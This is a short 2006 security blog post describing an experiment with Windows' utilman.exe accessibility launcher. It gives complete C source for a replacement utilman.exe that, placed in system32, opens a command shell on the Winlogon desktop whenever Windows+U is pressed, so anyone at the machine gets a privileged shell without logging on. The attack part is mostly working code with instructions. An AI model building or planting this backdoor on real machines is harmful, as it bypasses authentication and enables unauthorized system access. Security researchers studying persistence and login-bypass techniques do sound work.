Didier Stevens

Thursday 31 August 2006

My second playdate with utilman.exe

Filed under: Hacking — Didier Stevens @ 20:46

Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:

You can compile the following example with Borland’s free C++ 5.5 compiler.

Fourth experiment

Compile this simple C program, name it utilman.exe and put it in the system32 directory:

#include <stdio.h>
#include <windows.h>
#include <tchar.h>

void _tmain(void)
{
    STARTUPINFO s;
    PROCESS_INFORMATION p;
    LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
    LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\\\Winlogon"));

ZeroMemory(&s, sizeof(s));
    s.cb = sizeof(s);
    s.lpDesktop = szDesktop;
    ZeroMemory(&p, sizeof(p));

CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p);

CloseHandle(p.hProcess);
    CloseHandle(p.hThread);
}

Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.

utilman4.PNG

Blog at WordPress.com.